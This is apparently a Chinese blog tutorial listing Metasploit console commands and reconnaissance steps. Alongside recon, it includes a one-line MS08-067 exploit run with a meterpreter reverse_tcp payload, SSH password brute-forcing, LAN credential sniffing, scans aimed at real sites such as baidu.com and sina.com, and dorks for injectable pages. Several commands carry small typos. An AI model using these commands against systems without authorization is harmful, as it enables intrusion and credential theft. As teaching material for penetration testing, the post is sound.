【Metasploit总结】之【MSF常用命令及信息收集】

最新推荐文章于 2024-04-22 17:09:59 发布
最新推荐文章于 2024-04-22 17:09:59 发布
阅读量3.7k 收藏 14
点赞数
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/110919500
版权

操作系统:kali Linux2020.3

smfconsole常用命令

msfconsole下可以直接使用终端命令,如ping等

msfdb start
# 启动msf数据库,msf数据库默认使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口
msfconsole -q
# 启动msfconsole(-q为安静启动)
db_status
# 查看数据库状态,若显示no connect,先exit msfconsole,查看5432端口是否在侦听,如果在,尝试重启msfdb:msfdb stop,msfdb start;或初始化msfdb:msfdb reinit

help
# 帮助
search
# 搜索
use
# 载入模块
info
# 查看模块信息
back
# 返回

show option
# 查看模块选项
show missing
# 查看必须配置而未被配置的选项
set
# 设置某一选项
show advanced
# 高级选项
run -j
# 执行模块(-j为后台执行)

jobs
# 查看正在运行的任务
jobs -K
# 关闭所有任务
jobs -k 2
# 关闭指定(job id)任务

session
# 查看已经连接的会话(shell)
session -i 1
# 使用某shell(session id)
background
# 暂时退出shell

route add 10.1.1.1 255.255.255.0 3
# 内网代理(其sessionid为3)

load
# 加载插件(unload去除插件)

resource add conmand.rc
# 导入运行命令文件(每行一个msf命令),终端下使用msfconsole -r conmand.rc
msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set rhost 192.168.172.130;set target 34;set payload windows/meterpreter/reverse_tcp;run"
# 终端下直接使用一些列命令


save
# 保存配置信息
exit
# 退出

被动信息收集

whois

msf6 > whois baidu.com

IP查询

recon-ng

子域名与ip批量改查询工具。
recon-ng

Dig

msf6 > dig sina.com any @8.8.8.8
# 查询A、NS等记录
msf6 > dig sina.com A @8.8.8.8
# 查询A记录

反向查询SOA(起始授权记录):

msf6 > dig -x 47.95.164.112

枚举网站目录结构

首先尝试:

www.baidu.com/robots.txt
# 记录用于防止搜索的目录的文件

GoogleHack

  1. 查找是否开放文件列表浏览的目录页面:
intext:to parent directory insite:baidu.com
  1. 查找指定格式文件:
filetype:xls insite:baidu.com

dir_scanner

基于字典的猜解目录:

msf6 > use auxiliary/scanner/http/dir_scanner 
msf6 auxiliary(scanner/http/dir_scanner) > set THREADS 50
THREADS => 50
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS www.baidu.com
RHOSTS => www.baidu.com
msf6 auxiliary(scanner/http/dir_scanner) > run

搜索网站中的E-mail地址

如目标邮件地址为@sina.com,可以利用search_email_collector进行收集(需要代理):

root@kali:~# proxychains msfconsole -q
msf6 > use auxiliary/gather/search_email_collector
msf6 auxiliary(gather/search_email_collector) > set domain sina.com
msf6 auxiliary(gather/search_email_collector) > run

利用GoogleHack搜索易存在注入的界面

insite:baidu.com inurl:?id=

主动信息收集

主机发现

主机发现模块位于auxiliary/scanner/discovery/下,常用的有:

auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_sweep

arp_sweep

msf6 > use auxiliary/scanner/discovery/arp_sweep 
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.172.0/24
rhosts => 192.168.172.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.131 appears to be up (VMware, Inc.).
[+] 192.168.172.136 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

udp_sweep同理。

db_nmap

在msf中可以通过db_nmap使用nmap:

msf6 > db_nmap -PU 192.168.172.0/24
msf6 > db_nmap -O 192.168.172.131
msf6 > hosts
# 查看已扫描的主机

与直接nmap不同的是,db_nmap可以记录已扫描的主机。

查找僵尸机

  • auxiliary/scanner/ip/ipidseq模块
    找到僵尸机可以利用僵尸机进行扫描:
msf6 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
# sI后跟僵尸机IP

端口扫描与服务类型探测

推荐使用nmap进行端口扫描。

portscan目录

  • auxiliary/scanner/portscan/模块目录:
msf6 > search portscan/

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ack                         normal  No     TCP ACK Firewall Scanner
   1  auxiliary/scanner/portscan/ftpbounce                   normal  No     FTP Bounce Port Scanner
   2  auxiliary/scanner/portscan/syn                         normal  No     TCP SYN Port Scanner
   3  auxiliary/scanner/portscan/tcp                         normal  No     TCP Port Scanner
   4  auxiliary/scanner/portscan/xmas                        normal  No     TCP "XMas" Port Scanner


Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/portscan/xmas
  • ack:通过ACK扫描对端口进行探测;
  • ftpbounce:通过FTP bounce 攻击的原理对TCP 服务进行枚举,主要存在于一些旧的Solaris及FreeBSD 系统的FTP服务中。
  • syn:通过发送TCP SYN 标志的方式探测开放端口。
  • tcp:通过完整TCP连接判断端口是否开放。
  • xmas:更为隐蔽的扫描方式,通过发送FIN、PSH 和 URG 标志,能够避免一些高级的TCP 标记检测器的过滤。

一般情况推荐使用syn扫描。

db_nmap

端口状态
  • open:此端口正在被应用程序监听
  • closed:主机已响应,但没有应用程序监听
  • filtered:Nmap不能确定,可能被防火墙保护
  • unfiltered:仅在ACK扫描时,Nmap无法确定是否开放,可以使用其他类型进一步扫描。(如SYN、FIN等)
常用扫描参数与扫描选项
参数
  • sT:TCP 扫描
  • sS:TCP SYN扫描(隐蔽)
  • sA:TCP ACK扫描
  • sP:发送ICMP echo 请求探测主机是否存活,原理同Ping
  • sU:探测开放的UDP 端口
  • sF/sX/sN:发送一些标志位躲避防火墙检测
选项
  • Pn:扫描前不发送ICMP echo请求测试探测主机是否存活(将目标主机视为存活)
  • O:操作系统探测(基于TCP/IP协议栈的指纹特征)
  • F:快速扫描(只扫描nmap-services中列出的端口)
  • p<端口范围>:指定端口范围
服务信息探测

在知道目标主机存活之后,进一步探测服务版本信息,看是否是存在漏洞的版本:

msf6 > db_nmap -sV 192.168.172.131 -Pn

常见网络服务扫描

若已知目标开启了某服务,可对其进行进一步扫描。
可以搜索scanner/<服务名称>,如smb:search scanner/smb。

Telnet

  • auxiliary/scanner/telnet/telnet_version 模块
msf6 > use auxiliary/scanner/telnet/telnet_version 
msf6 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.172.0/24
rhosts => 192.168.172.131
msf6 auxiliary(scanner/telnet/telnet_version) > set thread 100
thread => 100
msf6 auxiliary(scanner/telnet/telnet_version) > run

SSH

  • auxiliary/scanner/ssh/ssh_version模块

Oracle 数据库服务

  • auxiliary/scanner/oracle/tnslsnr_version模块

开放代理探测

  • auxiliary/scanner/http/open_proxy模块

不清楚的选项可以使用show options查看说明。

msf6 auxiliary(scanner/http/open_proxy) > set multiports true 
multiports => true
msf6 auxiliary(scanner/http/open_proxy) > set rhosts 24.25.24.1-24.25.26.254
rhosts => 24.25.24.1-24.25.26.254
msf6 auxiliary(scanner/http/open_proxy) > set threads 100
threads => 100
msf6 auxiliary(scanner/http/open_proxy) > set verifyconnect true 
verifyconnect => true
msf6 auxiliary(scanner/http/open_proxy) >

Waf识别

httpwaf识别

msf6 > wafw00f www.baidu.com

口令破解与嗅探

口令破解

SSH
  • auxiliary/scanner/ssh/ssh_login 模块
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.136
rhosts => 192.168.172.136
msf6 auxiliary(scanner/ssh/ssh_login) > set user root
user => rootauxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
pass_file => /pass.txt
# 也可以设置userpass_file,就可以不用设置user
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_login) > run
SNMP
  • auxiliary/scanner/snmp/snmp_login模块


发现端口后也可以尝试利用hydra破解。

口令嗅探

  • auxiliary/sniffer/psnuffle模块

内网嗅探:

msf6 > use auxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > run

漏洞扫描

扫描器

关于大型漏洞扫描器(如openvas、Nessus,AWVS,Appscan等),请参考以前的文章。

Nmap

脚本路径:

/usr/share/nmap/scripts

当你发现目标开放服务后,可以使用nmap对指定服务发现漏洞:

ls /usr/share/nmap/scripts | grep smb
AA8j
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSF 详解
m0_72125469的博客
05-19 4376
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
Kali-msfdb-Postgresql报错排查处理
灰蜗牛
10-26 1834
目录1.报错2.解决方法3.排查过程 1.报错 虚假的报错,关键词: ┌──(xavier㉿xavier)-[~] └─$ psql psql: 错误: 无法连接到服务器:无法联接到服务器: 没有那个文件或目录 服务器是否在本地运行并且在 Unix 域套接字 "/var/run/postgresql/.s.PGSQL.5432"上准备接受联接? 真实的报错,关键词:Postgresql日志文件: ┌──(xavier㉿xavier)-[~] └─$ sudo tail /v
记录一次体验kali渗透工具MSF以及msfconsole命令详解
最新发布
ch_ycc的博客
04-22 1993
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
msfconsole中db_namp的使用方法以及如何让msf连接数据库
qq_59020256的博客
03-11 520
db_nmap -sS 192.168.251.139(IP地址)查看数据库postgresql连接状态、查询地址开放的端口号并将其写入到数据库中。将查询到的结果存入到数据库中。启动postgresql。
msf出现Database not connected等问题【已解决】
p15097962069的博客
08-09 794
msf出现Database not connected等问题【已解决】
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2533
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习了 Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
metasploit常用渗透命令.zip
09-16
metasploit常用渗透命令.zip
msf命令全集
06-05
MSFMetasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:从当前环境返回...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它提供了丰富的功能,能够帮助测试者收集信息、控制目标系统、执行命令、窃取数据等。 0x01 初识 Meterpreter Meterpreter 是由 Rapid7 开发的 ...
metasploit常用渗透命令[文].pdf
10-11
以下是一些关于Metasploit常用渗透命令的详细解释: 1. **升级命令**:`svn update` 是用来更新Metasploit框架到最新版本的,确保你使用的工具是最新的,可以修复已知问题并包含最新的漏洞利用。 2. **启动Web接口...
MSF技术总结
05-07
MSFMetasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
Fix metasploit “Database not connected or cache not built”
u011500307的专栏
10-30 3028
This is a short post explaining how to deal with metasploit instance not connected to its database (I’m using the new Kali Linux but it is the same for Backtrack 5). The issue usually surfaces when yo
msf 下 database not connect解决方法
新博客:https://aping-dev.com/
12-22 1589
http://blog.csdn.net/pyufftj/article/details/20617513
Manjaro安装配置Msf(Metasploit)并配置msfdb数据库
weixin_45629684的博客
07-18 1750
简介 最近更换了Manjaro作为我的主力系统,在安装常用的渗透测试工具的时候,安装msf遇到了一些问题 安装 Arch系的pacman之强早有所耳闻,但是没想到有这么强,Msf都可以直接Pacman sudo pacman -S metasploit 至此,msf就成功安装了 配置 问题就出来了msf数据库的配置上,在安装好postgresql之后,仍然无法通过msfdb进行init Missing requirement: 'bundle' does not appear to be installe
MSF使用小技巧
永远是少年
06-08 4116
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用小技巧。 一、MSF命令行开启 二、MSF退出 三、MSF 数据库导入和导出 四、MSF会话设置
msf渗透实验基本操作(上)
kiwifruit__的博客
11-23 4265
1.实验内容 (1)Metasploit主机扫描 (2)Metasploit漏洞利用 (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit内网攻击及域渗透技术。 3.实验环境 vm虚拟机; kali2012,ip地址是192.168.70.128 win...
【渗透测试笔记】之【初探MSF
AA8j的博客
11-05 251
主目录: /usr/share/metasploit-framework 基本模块介绍 exploit 攻击方法。 auxiliary 用于信息搜集、枚举、指纹探测、扫描等。 payloads 攻击载荷。 singles:体积大功能全的攻击载荷。 stagers:体积小,用于建立网络连接。 stages:用于stagers建立连接后,后续的攻击载荷。 encoders 对payloads进行加密,躲避AV。 nops 提高payloads的稳定性。 基本使用方法 启动 1.终端输入msfconsol
Linux进程及job管理
Next_FSE的博客
07-11 1096
一、进程管理 ps:查看进程状态      a:所有与终端有关的进程      u:      x:所有与终端无关的进程 进程的分类      跟终端相关的进程      跟终端无关的进程 进程状态      D:不可中断的睡眠      R:运行或就绪      S:可中断的睡眠      T:停止      Z:僵死        
Metasploit信息收集
weixin_41489908的博客
08-11 561
毕业了,想留的人没能留住,想要的生活也没有如约而至,也就这样了。。。 ---- 网易云热评 一、MSF更新 1、apt-get update 2、apt-get install metasploit-framework 二、敏感目录收集 1、查找dir_scanner模块 search dir_scanner type:auxiliary 2、选择扫描用到的辅助模块 use 0或者use auxiliary/scanner/http/dir_scanner 3、查看需要设置的参.
学会MSF常用命令
12-08
以下是MSF常用命令和用法: 1. 查看有哪些命令命令用法: ```console msf6 > ? ``` 该命令可以列出所有可用的命令命令用法。 2. 设置变量: ```console msf6 > set <变量名> <变量值> ``` 该命令可以设置变量的值,例如: ```console msf6 > set RHOSTS 192.168.0.1 ``` 3. 运行模块: ```console msf6 > run ``` 该命令可以运行当前选定的模块。 4. 列出可用的模块: ```console msf6 > search <关键字> ``` 该命令可以列出所有包含关键字的可用模块。 5. 显示当前选定的模块信息: ```console msf6 > info ``` 该命令可以显示当前选定的模块的详细信息。 6. 设置payload: ```console msf6 > set payload <payload名称> ``` 该命令可以设置payload的名称,例如: ```console msf6 > set payload windows/meterpreter/reverse_tcp ``` 7. 设置监听器: ```console msf6 > set LHOST <本地IP地址> msf6 > set LPORT <本地端口号> ``` 该命令可以设置监听器的本地IP地址和端口号。 8. 执行扫描: ```console msf6 > db_nmap <目标IP地址> ``` 该命令可以执行对目标IP地址的扫描。 9. msf更新: ```console apt install --only-upgrade metasploit-framework ``` 该命令可以更新msf到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值